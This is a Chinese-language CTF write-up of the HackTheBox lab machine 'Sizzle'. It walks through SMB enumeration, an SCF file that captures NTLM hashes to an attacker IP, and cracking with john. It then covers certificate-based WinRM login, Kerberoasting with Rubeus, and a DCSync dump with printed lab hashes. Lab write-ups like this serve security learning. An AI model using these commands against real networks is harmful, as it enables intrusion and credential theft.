Sizzle on HackTheBox

William Lin

2024-12-29

AD, Active Directory, HackTheBox, Pentesting, Windows, certsrv, smb

Before all

Insane 好難打 qwq
最後被扁到看 write up
Victim’s IP : 10.10.10.103
Attacker’s IP : 10.10.14.14

RECON

port scan

Command

1	rustscan -a 10.10.10.103 --ulimit 5000 -- -sC -sV -Pn

Result

PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-29T02:58:52+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA/domainComponent=HTB
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after:  2020-07-02T17:58:55
| MD5:   240b:1eff:5a65:ad8d:c64d:855e:aeb5:9e6b
| SHA-1: 77bb:3f67:1b6b:3e09:b8f9:6503:ddc1:0bbf:0b75:0c72
| -----BEGIN CERTIFICATE-----
| MIIFPTCCBCWgAwIBAgITaQAAAAXvru32D6T3IQAAAAAABTANBgkqhkiG9w0BAQsF
| ... a lot of stuffs
|_-----END CERTIFICATE-----
443/tcp   open  ssl/http      syn-ack ttl 127 Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA/domainComponent=HTB
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after:  2020-07-02T17:58:55
| MD5:   240b:1eff:5a65:ad8d:c64d:855e:aeb5:9e6b
| SHA-1: 77bb:3f67:1b6b:3e09:b8f9:6503:ddc1:0bbf:0b75:0c72
| -----BEGIN CERTIFICATE-----
| MIIFPTCCBCWgAwIBAgITaQAAAAXvru32D6T3IQAAAAAABTANBgkqhkiG9w0BAQsF
| ... a lot of stuffs
|_-----END CERTIFICATE-----
| tls-alpn: 
|   h2
|_  http/1.1
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2024-12-29T02:58:51+00:00; 0s from scanner time.
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-29T02:58:51+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA/domainComponent=HTB
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after:  2020-07-02T17:58:55
| MD5:   240b:1eff:5a65:ad8d:c64d:855e:aeb5:9e6b
| SHA-1: 77bb:3f67:1b6b:3e09:b8f9:6503:ddc1:0bbf:0b75:0c72
| -----BEGIN CERTIFICATE-----
| MIIFPTCCBCWgAwIBAgITaQAAAAXvru32D6T3IQAAAAAABTANBgkqhkiG9w0BAQsF
| ... a lot of stuffs
|_-----END CERTIFICATE-----
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-29T02:58:52+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA/domainComponent=HTB
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after:  2020-07-02T17:58:55
| MD5:   240b:1eff:5a65:ad8d:c64d:855e:aeb5:9e6b
| SHA-1: 77bb:3f67:1b6b:3e09:b8f9:6503:ddc1:0bbf:0b75:0c72
| -----BEGIN CERTIFICATE-----
| MIIFPTCCBCWgAwIBAgITaQAAAAXvru32D6T3IQAAAAAABTANBgkqhkiG9w0BAQsF
| ... a lot of stuffs 
|_-----END CERTIFICATE-----
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-29T02:58:51+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA/domainComponent=HTB
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after:  2020-07-02T17:58:55
| MD5:   240b:1eff:5a65:ad8d:c64d:855e:aeb5:9e6b
| SHA-1: 77bb:3f67:1b6b:3e09:b8f9:6503:ddc1:0bbf:0b75:0c72
| -----BEGIN CERTIFICATE-----
| MIIFPTCCBCWgAwIBAgITaQAAAAXvru32D6T3IQAAAAAABTANBgkqhkiG9w0BAQsF
| ... a lot of stuffs
|_-----END CERTIFICATE-----
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49691/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49693/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49708/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
58437/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
58456/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

一台有開 smb, ldap, msrpc 和一個神奇 port 80 的 Windows 主機
獲得域名 HTB.LOCAL 及 sizzle，值得注意的是沒有開 kerberos

directory enumeration

Command

1	dirsearch --url 'http://10.10.10.103'

Result

[04:09:12] Starting:                                                                                
[04:09:15] 403 -  312B  - /%2e%2e//google.com                               
[04:09:15] 403 -  312B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd             
[04:09:15] 404 -    2KB - /.ashx                                            
[04:09:15] 404 -    2KB - /.asmx                                            
[04:09:29] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           
[04:09:34] 404 -    2KB - /admin%20/                                        
[04:09:35] 404 -    2KB - /admin.                                           
[04:09:49] 301 -  157B  - /aspnet_client  ->  http://10.10.10.103/aspnet_client/
[04:09:49] 403 -    1KB - /aspnet_client/
[04:09:49] 404 -    2KB - /asset..                                          
[04:09:54] 403 -    1KB - /certenroll/                                      
[04:09:54] 401 -    1KB - /certsrv/                                         
[04:09:54] 403 -  312B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd     
[04:10:02] 400 -    3KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[04:10:11] 403 -    1KB - /images/                                          
[04:10:11] 301 -  150B  - /images  ->  http://10.10.10.103/images/
[04:10:12] 404 -    2KB - /index.php.                                       
[04:10:14] 404 -    2KB - /javax.faces.resource.../                         
[04:10:14] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd                                                                                   
[04:10:14] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd                                                                                          
[04:10:14] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[04:10:14] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo                                                                                          
[04:10:14] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[04:10:14] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned                                                                                             
[04:10:14] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[04:10:14] 400 -    3KB - /jolokia/exec/java.lang:type=Memory/gc
[04:10:14] 400 -    3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage    
[04:10:14] 400 -    3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[04:10:14] 400 -    3KB - /jolokia/search/*:j2eeType=J2EEServer,*           
[04:10:14] 400 -    3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[04:10:17] 404 -    2KB - /login.wdm%2e                                     
[04:10:19] 404 -    2KB - /mcx/mcxservice.svc                               
[04:10:32] 404 -    2KB - /rating_over.                                     
[04:10:32] 404 -    2KB - /reach/sip.svc                                    
[04:10:36] 404 -    2KB - /service.asmx                                     
[04:10:41] 404 -    2KB - /static..                                         
[04:10:47] 403 -    2KB - /Trace.axd                                        
[04:10:47] 404 -    2KB - /umbraco/webservices/codeEditorSave.asmx          
[04:10:51] 404 -    2KB - /WEB-INF./                                        
[04:10:53] 404 -    2KB - /WebResource.axd?d=LER8t9aS                       
[04:10:53] 404 -    2KB - /webticket/webticketservice.svc

注意到一個需要 http-auth 的路徑 certsrc，查一下發現是 AD 的憑證服務：
https://learn.microsoft.com/zh-tw/windows-server/identity/ad-cs/certificate-authority-web-enrollment

Exploit

scf file attack

smb 允許 guest 無密碼認證，先列舉一下吧 :D
Command

1	smbclient -L //10.10.10.103/ -N

Result

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
CertEnroll      Disk      Active Directory Certificate Services share
Department Shares Disk      
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
Operations      Disk      
SYSVOL          Disk      Logon server share

經檢查，只有 Department Shares 可以造訪並列表 …
利用 mount 抓到自己主機內尋找

1	sudo mount -t cifs -o rw,username=guest,password= '//10.10.10.103/Department Shares' /mnt

接下來用如下腳本尋找可寫的資料夾：
find-w.sh

#!/bin/bash
list=$(find /mnt -type d)
for d in $list
do
        touch $d/x 2>/dev/null
        if [ $? -eq 0 ]
        then
                echo $d " is writable"
        fi
done

Result

1 2	/mnt/Users/Public is writable /mnt/ZZ_ARCHIVE is writable

接著將惡意的 scf file 放進主機，具體內容可看：
https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

@exp.scf

[Shell]
Command=2
IconFile=\\10.10.14.14\share\whale.ico
[Taskbar]
Command=ToggleDesktop

最後放進主機：

┌──(kali🐳kali)-[~/ctf/hackthebox/sizzle]
└─$ smbclient '//10.10.10.103/Department Shares' -N
Try "help" to get a list of possible commands.
smb: \> cd Users/Public
smb: \Users\Public\> put @exp.scf

接下來用 responder 收聽 tun0 所有資訊：

1	sudo responder -I tun0

Result

1
2
3

[SMB] NTLMv2-SSP Client   : 10.10.10.103
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash     : amanda::HTB:e78d6bf8ec9ce164:B1FCA5EB7768E4AB418924D45EFCA0D2:0101000000000000002D1369A259DB019F1200851F8CAD6B0000000002000800310056004F00530001001E00570049004E002D004B0044003100490052003600340049004F003400390004003400570049004E002D004B0044003100490052003600340049004F00340039002E00310056004F0053002E004C004F00430041004C0003001400310056004F0053002E004C004F00430041004C0005001400310056004F0053002E004C004F00430041004C0007000800002D1369A259DB010600040002000000080030003000000000000000010000000020000006747BA36BA6A6F5FE6BACF5700EF4255B095EB6FE744AE2896C0C06D25CE41C0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003400000000000000000000000000

收聽成功，利用 john 進行 hash 字典攻擊

1	john hash --wordlist=/home/kali/rockyou.txt

利用獲得的帳密登入 http://10.10.10.103

但是 evil-winrm 會登入失敗…憑證錯誤，所以要先去拿一張新的

Apply new cert

用 openssl 生成新的 private key 和 cert：

1	openssl req -new -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr

接著到 Request a certificate -> advanced certificate request 新增一個憑證請求，把 amanda.csr 傳上去

最後把憑證以 base64 下載下來

以 evil-winrm 進行連線：
Command

1	evil-winrm -i 10.10.10.103 -u amanda -S -c certnew.cer -k amanda.key

P.S. -u 的選項疑似不用指定…

Privilege Escalation

一樣先用 bloodhound 進行資訊採集：

1	bloodhound-python -c All -u 'amanda' -p 'Ashare1972' -d HTB.LOCAL -ns 10.10.10.103 --zip

注意到 MRLKY kerberoastable：

kerberoasting with Rebeus

因為 kerberos 沒有對外開放，在主機內以 Rebeus 進行攻擊：

1	.\Rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972

將獲得的 TGS 以john爆破，取得密碼後再按照上面的流程申請一遍憑證就可以以 evil-winrm 再次登入了

DCSync

了無新意的 DCSync…
利用 impacket-secretsdump 進行攻擊：

1	impacket-secretsdump 'htb.local'/'mrlky':'Football#7'@'htb.local'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
... a lot of stuffs

最後用 smbexec 進行 pass the hash

OWNED

After all

這台機器嚴格來說只有第一步 scf 和 cert 的部分真的卡到，沒想像中難(?)
但還是學到好多，開心開心